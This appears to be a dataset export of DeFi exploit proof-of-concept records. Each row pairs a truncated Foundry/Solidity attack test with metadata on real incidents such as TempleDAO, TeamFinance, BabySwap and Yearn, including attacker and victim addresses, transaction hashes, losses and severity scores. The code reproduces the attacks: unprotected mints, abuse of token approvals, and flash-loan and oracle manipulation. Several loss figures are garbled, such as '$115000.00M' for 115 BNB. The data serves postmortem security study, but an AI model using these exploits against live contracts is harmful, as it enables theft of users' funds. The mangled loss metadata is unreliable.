hex"006de4df000000000000000000000000000000000000000000000000000000000000000100000... | true | over $21 Million | https://bscscan.com/address/0x8CA8fD9C7641849A14CbF72FaF05c305B0c68a34 | https://bscscan.com/address/0x8785bb8deAE13783b24D7aFE250d42eA7D7e9d72 | https://bscscan.com/tx/0x181a7882aac0eab1036eedba25bc95a16e10f61b5df2e99d240a16c334b9b189 | $21.00M | 8.6 | high | TransitSwap Exploit (2022-10) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo
// Attacker : 0x0000000038b8889b6ab9790e20FC16fdC5714922
// Attack Contract : https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4
// Vulnerable Contract : https://bs... | exploit_poc | BabySwap | 2022-10 | BabySwap_exp.sol | null | 16a6366093079df0 | 2026-01-07T10:59:16.517095 | postmortems | bsc | 21,811,979 | null | null | null | https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4 | https://bscscan.com/address/0x5c9f1A9CeD41cCC5DcecDa5AFC317b72f1e49636 | https://bscscan.com/tx/0xcca7ea9d48e00e7e32e5d005b57ec3cac28bc3ad0181e4ca208832e62aa52efe | null | null | true | true | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDT balance before exploit", USDT_TOKEN.balanceOf(address(this)), 18
);
(bool success,) = address(WBNB_TOKEN).call{value: 20_000}("");
require(success, "Transfer failed.");
WBNB_TOKEN.appr... | true | https://bscscan.com/address/0xde7e741bd9dc7209b56f1ef3b663efb288c928d4 | https://bscscan.com/address/0x5c9f1A9CeD41cCC5DcecDa5AFC317b72f1e49636 | https://bscscan.com/tx/0xcca7ea9d48e00e7e32e5d005b57ec3cac28bc3ad0181e4ca208832e62aa52efe | Unknown | 7.66 | medium | BabySwap Exploit (2022-10) | false | true | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $~2.3M
// Attacker : 0x9c9fb3100a2a521985f0c47de3b4598dafd25b01
// Attack Contract : https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0
// Vulnerabl... | exploit_poc | Templedao | 2022-10 | Templedao_exp.sol | access_control | 3a459dd07a7fd356 | 2026-01-07T10:59:16.517148 | postmortems | ethereum | 15,725,066 | $~2.3M | 2,300,000 | null | https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0 | https://etherscan.io/address/0xd2869042e12a3506100af1d192b5b04d65137941 | https://etherscan.io/tx/0x8c3f442fc6d640a6ff3ea0b12be64f1d4609ea94edd2966f42c01cd9bdcf04b5 | null | null | true | true | true | critical | $~2.3M | access-control | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker xFraxTempleLP balance before exploit", xFraxTempleLP.balanceOf(address(this)), 18
);
uint256 lpbalance = xFraxTempleLP.balanceOf(address(StaxLPStaking));
// Perform migrateStake()
StaxLPS... | true | $~2.3M | https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0 | https://etherscan.io/address/0xd2869042e12a3506100af1d192b5b04d65137941 | https://etherscan.io/tx/0x8c3f442fc6d640a6ff3ea0b12be64f1d4609ea94edd2966f42c01cd9bdcf04b5 | $2.30M | 8.2 | high | Templedao Exploit (2022-10) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Address https://polygonscan.com/address/0x940ce652a51ebadb5df09d605dbeda95fdcf697b
interface Target {
struct Call {
address target;
bytes callData;
uint256 value;
... | exploit_poc | MulticallWithoutCheck | 2022-10 | MulticallWithoutCheck_exp.sol | null | 24d903404b898fcd | 2026-01-07T10:59:16.517192 | postmortems | polygon | 34,743,770 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
uint256 USDTBlance = USDT.balanceOf(address(target));
bytes memory data = abi.encodeWithSignature("transfer(address,uint256)", address(this), USDTBlance);
Target.Call memory inputData = Target.Call({target: address(USDT), callData: data, value: 0});
Target... | true | Unknown | 2.71 | low | MulticallWithoutCheck Exploit (2022-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2,5K USDC
// Attacker : 0xcc1A341D0F2a06Eaba436935399793F05C2bbE92
// Attack Contract : https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95
// Vulne... | exploit_poc | Uerii | 2022-10 | Uerii_exp.sol | access_control | fc2b2832931f23d1 | 2026-01-07T10:59:16.517236 | postmortems | ethereum | 15,767,837 | ~2,5K USDC | 2 | null | https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95 | https://etherscan.io/address/0x418c24191ae947a78c99fdc0e45a1f96afb254be | https://etherscan.io/tx/0xf4a3d0e01bbca6c114954d4a49503fc94dfdbc864bded5530b51a207640d86b5 | null | null | true | true | true | low | ~2,5K USDC | access-control | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18
);
// Actual payload exploiting the missing access control
UERII_TOKEN.mint();
// Exchanging the newly minted UERII f... | true | ~2,5K USDC | https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95 | https://etherscan.io/address/0x418c24191ae947a78c99fdc0e45a1f96afb254be | https://etherscan.io/tx/0xf4a3d0e01bbca6c114954d4a49503fc94dfdbc864bded5530b51a207640d86b5 | $2 | 8.85 | high | Uerii Exploit (2022-10) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Analysis
// https://twitter.com/BlockSecTeam/status/1584959295829180416
// https://twitter.com/AnciliaInc/status/1584955717877784576
// TX
// https://etherscan.io/tx/0x8037b3dc0bf9d5d396c1050682... | exploit_poc | N00d | 2022-10 | N00d_exp.sol | null | 1cc00da76422804e | 2026-01-07T10:59:16.517285 | postmortems | ethereum | 15,826,379 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
registry.setInterfaceImplementer(
address(this), bytes32(0x29ddb589b1fb5fc7cf394961c1adf5f8c6454761adf795e67fe149f658abe895), address(this)
);
n00d.approve(address(Bar), type(uint256).max);
// The swap is performed 4 times.
int256 j;
... | true | Unknown | 3.63 | low | N00d Exploit (2022-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~200,000 US$
// Attacker : 0xb687550842a24d7fbc6aad238fd7e0687ed59d55
// Attack Contract : 0x9682f31b3f572988f93c2b8382586ca26a866475
// Vulnerable Contract : 0x6eb211ca... | exploit_poc | RabbyWallet_SwapRouter | 2022-10 | RabbyWallet_SwapRouter_exp.sol | null | 794442cc5b315685 | 2026-01-07T10:59:16.517348 | postmortems | unknown | 15,724,451 | ~200,000 US$ | 200 | null | null | null | null | null | null | true | true | false | low | ~200,000 US$ | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDC balance before exploit", USDC_TOKEN.balanceOf(address(this)), 6
);
// Somehow attacker got these EOA addresses that approved the Rabby Wallet Swap Router contract.
// ...Maybe the attacker gr... | true | ~200,000 US$ | $200 | 7 | medium | RabbyWallet_SwapRouter Exploit (2022-10) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~750 ETH
// Attacker : 0xdf31F4C8dC9548eb4c416Af26dC396A25FDE4D5F
// Attack Contracts :
// - https://etherscan.io/address/0x140cca423081ed0366765f18fc9f5ed299699388
// ... | exploit_poc | EFLeverVault | 2022-10 | EFLeverVault_exp.sol | flash_loan | 4f778930b29683db | 2026-01-07T10:59:16.517409 | postmortems | ethereum | 15,746,199 | ~750 ETH | 750 | null | null | https://etherscan.io/address/0xe39fd820b58f83205db1d9225f28105971c3d309 | null | null | null | true | true | true | low | ~750 ETH | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18
);
uint256 ethBalanceBefore = address(this).balance;
// Deposit 0.1 ETH into the EFLever Vault
EFLEVER_VAULT.deposit{v... | true | ~750 ETH | https://etherscan.io/address/0xe39fd820b58f83205db1d9225f28105971c3d309 | $750 | 8.08 | high | EFLeverVault Exploit (2022-10) | true | true | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 100,000,000,000,000 RNBW
// Attacker : 0x0f44f3489D17e42ab13A6beb76E57813081fc1E2
// Attack Contract : 0xE167cdAAc8718b90c03Cf2CB75DC976E24EE86D3
// Vulnerable Contract ... | exploit_poc | XaveFinance | 2022-10 | XaveFinance_exp.sol | null | c6162caebbbe41a7 | 2026-01-07T10:59:16.517477 | postmortems | ethereum | 15,704,736 | 100,000,000,000,000 RNBW | 100 | null | null | https://etherscan.io/address/0x8f9036732b9aa9b82D8F35e54B71faeb2f573E2F | https://etherscan.io/tx/0xc18ec2eb7d41638d9982281e766945d0428aaeda6211b4ccb6626ea7cff31f4a | null | null | true | true | false | low | 100,000,000,000,000 RNBW | unknown | function testAttack() public {
// tx to mint 100,000,000,000,000 RNBW tokens
bytes32 tx0 = DAO_MODULE.getTransactionHash(
address(RNBW_TOKEN),
0,
encodeWithSignature_mint(ATTACKER_EOA, 100_000_000_000_000_000_000_000_000_000_000),
//hex"40c10f1900000000000... | true | 100,000,000,000,000 RNBW | https://etherscan.io/address/0x8f9036732b9aa9b82D8F35e54B71faeb2f573E2F | https://etherscan.io/tx/0xc18ec2eb7d41638d9982281e766945d0428aaeda6211b4ccb6626ea7cff31f4a | $100 | 9 | high | XaveFinance Exploit (2022-10) | true | true | true | false | ||||
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~115 BNB
// Attacker : 0xaB74FBd735Cd2ED826b64e0F850a890930A91094
// Attack Contracts :
// - https://www.bscscan.com/address/0xe3eA6e35A6F88DB9d342352B056139803A94b586
// - ht... | exploit_poc | HPAY | 2022-10 | HPAY_exp.sol | null | d71de3729f259359 | 2026-01-07T10:59:16.517551 | postmortems | bsc | 22,280,853 | ~115 BNB | 115,000,000,000 | null | null | https://www.bscscan.com/address/0xe9bc03ef08e991a99f1bd095a8590499931dcc30 | null | null | null | true | true | false | critical | ~115 BNB | unknown | false | ~115 BNB | https://www.bscscan.com/address/0xe9bc03ef08e991a99f1bd095a8590499931dcc30 | $115000.00M | 5.78 | medium | HPAY Exploit (2022-10) | true | true | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~12 WBNB
// Attacker : 0xde01f6Ce91E4F4bdB94BB934d30647d72182320F
// Attack Contract : 0x08a525104Ea2A92aBbcE8e4e61C667eED56f3B42
// Vulnerable Contract : 0xc342774492b5... | exploit_poc | BEGO | 2022-10 | BEGO_exp.sol | null | f9e3d2bc09c65b24 | 2026-01-07T10:59:16.517608 | postmortems | bsc | 22,315,679 | ~12 WBNB | 12 | null | null | null | https://bscscan.com/tx/0x9f4ef3cc55b016ea6b867807a09f80d1b2e36f6cd6fccfaf0182f46060332c57 | null | null | true | true | false | low | ~12 WBNB | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker WBNB balance before exploit", WBNB_TOKEN.balanceOf(address(this)), 18
);
bytes32[] memory _r = new bytes32[](0);
bytes32[] memory _s = new bytes32[](0);
uint8[] memory _v = new uint8[](0);... | true | ~12 WBNB | https://bscscan.com/tx/0x9f4ef3cc55b016ea6b867807a09f80d1b2e36f6cd6fccfaf0182f46060332c57 | $12 | 6.41 | medium | BEGO Exploit (2022-10) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Multiple Tokens ~$15.8M US$
// Root Cause : Lack of check function parameter legitimate
// Attacker : 0x161cebb807ac181d5303a4ccec2fc580cc5899fd
// Attack Contract :... | exploit_poc | TeamFinance | 2022-10 | TeamFinance_exp.sol | null | 2a0212482846be40 | 2026-01-07T10:59:16.517679 | postmortems | ethereum | 15,837,893 | Multiple Tokens ~$15.8M US$ | 15,800,000 | null | null | https://etherscan.io/address/0x48d118c9185e4dbafe7f3813f8f29ec8a6248359#code#L1535 | https://etherscan.io/tx/0xb2e3ea72d353da43a2ac9a8f1670fd16463ab370e563b9b5b26119b2601277ce | null | null | true | true | false | critical | Multiple Tokens ~$15.8M US$ | unknown | function testExploit() public {
IV3Migrator.MigrateParams memory parms;
uint256 _liquidityToMigrate;
emit log_named_decimal_uint("[Before] Attack Contract ETH balance", address(this).balance, 18);
emit log_named_decimal_uint("[Before] Attack Contract DAI balance", IERC20(dai).balanceOf(... | true | Multiple Tokens ~$15.8M US$ | https://etherscan.io/address/0x48d118c9185e4dbafe7f3813f8f29ec8a6248359#code#L1535 | https://etherscan.io/tx/0xb2e3ea72d353da43a2ac9a8f1670fd16463ab370e563b9b5b26119b2601277ce | $15.80M | 9 | high | TeamFinance Exploit (2022-10) | true | true | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo -- Total Lost : ~25k USD
// TX : https://bscscan.com/tx/0xb1ad1188d620746e2e64785307a7aacf2e8dbda4a33061a4f2fbc9721048e012
// GUY : https://x.com/EXVULSEC/status/1820676684410147276
// R... | exploit_poc | NovaXM2E | 2024-08 | NovaXM2E_exp.sol | null | 547f0816aa7b3a86 | 2026-01-07T10:59:16.517765 | postmortems | bsc | 41,116,210 | ~25k USD | 25,000 | null | null | null | null | null | null | true | false | false | medium | ~25k USD | unknown | function testExploit() public {
emit log_named_decimal_uint("[End] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18);
swapamount = 500_000 ether;
Pair.swap(swapamount, 0, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDT balance after ... | true | $25.0K | 4.53 | low | NovaXM2E Exploit (2024-08) | true | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// TX : https://etherscan.io/tx/0xfe8bc757d87e97a5471378c90d390df47e1b29bb9fca918b94acd8ecfaadc598
// Profit : ~ 21000 USD
// REASON : Price Out Of Date
contract ContractTest is Test {
address ... | exploit_poc | Zenterest | 2024-08 | Zenterest_exp.sol | null | 805b8a779a6f1692 | 2026-01-07T10:59:16.517812 | postmortems | ethereum | 20,541,640 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.04 | low | Zenterest Exploit (2024-08) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0x12f27e81e54684146ec50973ea94881c535887c2e2f30911b3402a55d67d121d
// GUY : https://x.com/AnciliaInc/status/1822870201698050064
// Profit : ~ 338 WBN... | exploit_poc | IvestDao | 2024-08 | IvestDao_exp.sol | null | bacc39cfc7509aea | 2026-01-07T10:59:16.517856 | postmortems | unknown | 41,289,497 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.36 | low | IvestDao Exploit (2024-08) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~ 1M USD
// Attacker : https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3
// Attack Contract : https://etherscan.io/address/... | exploit_poc | VOW | 2024-08 | VOW_exp.sol | null | facd208e634cde25 | 2026-01-07T10:59:16.517913 | postmortems | ethereum | null | ~ 1M USD | 1,000,000 | https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3 | https://etherscan.io/address/0xb7f221e373e3f44409f91c233477ec2859261758 | https://etherscan.io/address/0x1bbf25e71ec48b84d773809b4ba55b6f4be946fb | https://etherscan.io/tx/0x758efef41e60c0f218682e2fa027c54d8b67029d193dd7277d6a881a24b9a561 | null | null | true | true | false | critical | ~ 1M USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
emit log_named_decimal_uint(
"Before exploit VOW balance of attacker:", IERC20(vow).balanceOf(attacker), IERC20(vow).decimals()
);
emit log_named_decimal_uint(
"Before exploit USDT balance of... | true | ~ 1M USD | https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3 | https://etherscan.io/address/0xb7f221e373e3f44409f91c233477ec2859261758 | https://etherscan.io/address/0x1bbf25e71ec48b84d773809b4ba55b6f4be946fb | https://etherscan.io/tx/0x758efef41e60c0f218682e2fa027c54d8b67029d193dd7277d6a881a24b9a561 | $1.00M | 8.79 | high | VOW Exploit (2024-08) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 10k
// Attacker : https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad
// Attack Contract : https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7, https://bscscan.com/address/... | exploit_poc | unverified_667d | 2024-08 | unverified_667d_exp.sol | null | 2a76d48138185bfd | 2026-01-07T10:59:16.517970 | postmortems | bsc | 41,770,501 | 10k | 10,000 | https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad | https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7, | https://bscscan.com/address/0x8de7eaba58efb23b6f323984377af582b23134e9 | https://bscscan.com/tx/0x56d3ed5f635b009e19d693e432479323b23b3eb368cf04e161adbc672a15898e | https://x.com/TenArmorAlert/status/1828983569278231038 | https://x.com/TenArmorAlert/status/1828983569278231038 | true | true | false | medium | 10k | unknown | function testPoC() public {
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(dai).balanceOf(address(attacker)), 18);
}
}
// 0xA2d1e47e1A154dD51f2eae0413100c4F8ABE13C7
con... | true | 10k | https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad | https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7, | https://bscscan.com/address/0x8de7eaba58efb23b6f323984377af582b23134e9 | https://bscscan.com/tx/0x56d3ed5f635b009e19d693e432479323b23b3eb368cf04e161adbc672a15898e | https://x.com/TenArmorAlert/status/1828983569278231038 | https://x.com/TenArmorAlert/status/1828983569278231038 | $10.0K | 7.21 | medium | unverified_667d Exploit (2024-08) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 280BNB
// Attacker : https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2
// Attack Contract : https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea, https://bscscan.com/addre... | exploit_poc | COCO | 2024-08 | COCO_exp.sol | null | 1c4a87519fb28ebb | 2026-01-07T10:59:16.518015 | postmortems | bsc | 41,529,776 | 280BNB | 280,000,000,000 | https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2 | https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea, | null | https://app.blocksec.com/explorer/tx/bsc/0x7b743f0fa0ffc6542bc4132405f6c986a00187b6a8b23613ab98c8bcfe9fd875 | https://x.com/TenArmorAlert/status/1826101724278579639 | https://x.com/TenArmorAlert/status/1826101724278579639 | true | true | false | critical | 280BNB | unknown | function testPoC() public {
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
vm.startPrank(addr);
IERC20(bsc_usd).approve(address(attC), type(uint256).max);
vm.stopPrank();
vm.startPrank(attacker, attacker);
attC.attac... | true | 280BNB | https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2 | https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea, | https://app.blocksec.com/explorer/tx/bsc/0x7b743f0fa0ffc6542bc4132405f6c986a00187b6a8b23613ab98c8bcfe9fd875 | https://x.com/TenArmorAlert/status/1826101724278579639 | https://x.com/TenArmorAlert/status/1826101724278579639 | $280000.00M | 5.98 | medium | COCO Exploit (2024-08) | true | false | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~200k USD
// TX : https://etherscan.io/tx/0x636be30e58acce0629b2bf975b5c3133840cd7d41ffc3b903720c528f01c65d9
// Original Attacker: https://etherscan.io/address/0x03560a... | exploit_poc | Convergence | 2024-08 | Convergence_exp.sol | null | 84f9e38f155f6823 | 2026-01-07T10:59:16.518059 | postmortems | ethereum | 20,434,450 | ~200k USD | 200,000 | https://etherscan.io/address/0x03560a9d7a2c391fb1a087c33650037ae30de3aa | https://etherscan.io/address/0xee45384d4861b6fb422dfa03fbdcc6e29d7beb69 | null | null | null | null | true | false | false | high | ~200k USD | unknown | false | https://etherscan.io/address/0x03560a9d7a2c391fb1a087c33650037ae30de3aa | https://etherscan.io/address/0xee45384d4861b6fb422dfa03fbdcc6e29d7beb69 | $200.0K | 3.35 | low | Convergence Exploit (2024-08) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4.37 ETH (~11527 USD)
// Attacker : https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831
// Attack Contract : https://etherscan.io/address/0xfaddf57d079... | exploit_poc | OMPxContract | 2024-08 | OMPxContract_exp.sol | flash_loan | 176abc3185d95a11 | 2026-01-07T10:59:16.518102 | postmortems | ethereum | 20,468,780 | 4.37 ETH (~11527 USD) | 4.37 | https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831 | https://etherscan.io/address/0xfaddf57d079b01e53d1fe3476cc83e9bcc705854 | https://etherscan.io/address/0x09a80172ed7335660327cd664876b5df6fe06108 | https://app.blocksec.com/explorer/tx/eth/0xd927843e30c6b2bf43103d83bca6abead648eac3cad0d05b1b0eb84cd87de9b6?line=0 | null | null | true | true | true | low | 4.37 ETH (~11527 USD) | flash-loan | function testExploit() public {
vm.startPrank(attacker);
emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", attacker.balance, 18);
AttackerC attackerC = new AttackerC();
attackerC.attack();
emit log_named_decimal_uint("[End] Attacker ETH balance after e... | true | 4.37 ETH (~11527 USD) | https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831 | https://etherscan.io/address/0xfaddf57d079b01e53d1fe3476cc83e9bcc705854 | https://etherscan.io/address/0x09a80172ed7335660327cd664876b5df6fe06108 | https://app.blocksec.com/explorer/tx/eth/0xd927843e30c6b2bf43103d83bca6abead648eac3cad0d05b1b0eb84cd87de9b6?line=0 | $4 | 8.93 | high | OMPxContract Exploit (2024-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~5k
// Attacker : https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
// Attack Contract : https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb6936... | exploit_poc | YodlRouter | 2024-08 | YodlRouter_exp.sol | null | d0b1c0c8cce0b62d | 2026-01-07T10:59:16.518155 | postmortems | ethereum | null | ~5k | 5,000 | https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf | https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb69361ff09ab3 | https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e | https://etherscan.io/tx/0x54f659773dae6e01f83184d4b6d717c7f1bb71c0aa59e8c8f4a57c25271424b3 | null | null | true | true | false | low | ~5k | unknown | function testExploit() public balanceLog {
//implement exploit code here
uint256 amount;
uint256 feeBps = 10_000;
address token = USDC;
address from;
address to = address(this);
// Victim 0
from = 0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0;
amount... | true | ~5k | https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf | https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb69361ff09ab3 | https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e | https://etherscan.io/tx/0x54f659773dae6e01f83184d4b6d717c7f1bb71c0aa59e8c8f4a57c25271424b3 | $5.0K | 7.17 | medium | YodlRouter Exploit (2024-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
//Converted to foundry test from this file https://gist.github.com/xu3kev/cb1992269c429647d24b6759aff6261c
// @K... | exploit_poc | Yearn_ydai | 2021-02 | Yearn_ydai_exp.sol | null | 98b018b00ffadc41 | 2026-01-07T10:59:16.518210 | postmortems | ethereum | 11,792,183 | ~11M US$ | 11,000,000 | null | null | null | https://etherscan.io/tx/0x59faab5a1911618064f1ffa1e4649d85c99cfd9f0d64dcebbc1af7d7630da98b | https://github.com/yearn/yearn-security/blob/master/disclosures/2021-02-04.md | null | true | true | false | critical | ~11M US$ | unknown | function testAttack() public {
// Construct the exploit logic here
uint256 hacker_dai_amt_before = dai.balanceOf(address(this));
uint256 hacker_usdc_amt_before = usdc.balanceOf(address(this));
require(usdt.balanceOf(address(this)) == 0, "has usdt");
require(crv3.balanceOf(addres... | true | ~11M US$ | https://etherscan.io/tx/0x59faab5a1911618064f1ffa1e4649d85c99cfd9f0d64dcebbc1af7d7630da98b | https://github.com/yearn/yearn-security/blob/master/disclosures/2021-02-04.md | $11.00M | 7.84 | medium | Yearn_ydai Exploit (2021-02) | true | false | true | true | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import {IERC20, IPriceFeed, IPancakeRouter, IUnitroller, IVyper} from "../interface.sol";
/* @KeyInfo -- Total Lost : 1,048 ETH + 400,000 DAI (~3,000,000 US$)
Attacker Wallet : https://bscscan.com/address/0xA6AF2872176320... | exploit_poc | FortressLoans | 2022-05 | FortressLoans_exp.sol | oracle_manipulation | fc80dada6d0a56b0 | 2026-01-07T10:59:16.518379 | postmortems | bsc | 17,490,837 | 1,048 ETH + 400,000 DAI (~3,000,000 US$) | 1 | null | null | null | null | null | null | true | false | true | low | 1,048 ETH + 400,000 DAI (~3,000,000 US$) | oracle-manipulation | function testExploit() public {
// txId : 0x18dc1cafb1ca20989168f6b8a087f3cfe3356d9a1edd8f9d34b3809985203501
// Do : Attacker Create [ProposalCreater] Contract
vm.rollFork(17_490_837); // make sure start from block 17490837
vm.startPrank(attacker); // Set msg.sender = attacker
Pr... | true | $1 | 7 | medium | FortressLoans Exploit (2022-05) | true | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Exploited tx: https://etherscan.io/tx/0xeb8c3bebed11e2e4fcd30cbfc2fb3c55c4ca166003c7f7d319e78eaab9747098
Debug:
https://dashboard.tenderly.co/tx/mainnet/0xeb8c3bebed11e2e4fcd30cbfc2fb3c55c4ca1... | exploit_poc | Bayc_apecoin | 2022-05 | Bayc_apecoin_exp.sol | flash_loan | 23c2dff00e248a8f | 2026-01-07T10:59:16.518538 | postmortems | ethereum | 14,403,948 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function test() public {
cheats.startPrank(0x6703741e913a30D6604481472b6d81F3da45e6E8);
bayc.transferFrom(0x6703741e913a30D6604481472b6d81F3da45e6E8, address(this), 1060);
emit log_named_decimal_uint("Before exploiting, Attacker balance of APE is", ape.balanceOf(address(this)), 18);
NFTX... | true | Unknown | 4.41 | low | Bayc_apecoin Exploit (2022-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Exploit Alert ref: https://www.panewslab.com/zh_hk/articledetails/f40t9xb4.html
// Origin Attack Transaction: 0xc346adf14e5082e6df5aeae650f3d7f606d7e08247c2b856510766b4dfcdc57f
// Blocksec Txin... | exploit_poc | Novo | 2022-05 | Novo_exp.sol | null | 06901226b120dfe6 | 2026-01-07T10:59:16.518610 | postmortems | bsc | 18,225,002 | null | null | null | null | https://bscscan.com/address/0xa0787daad6062349f63b7c228cbfd5d8a3db08f1#code | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
wbnb.deposit{value: 10 * 1e18}();
emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", wbnb.balanceOf(address(this)), 18);
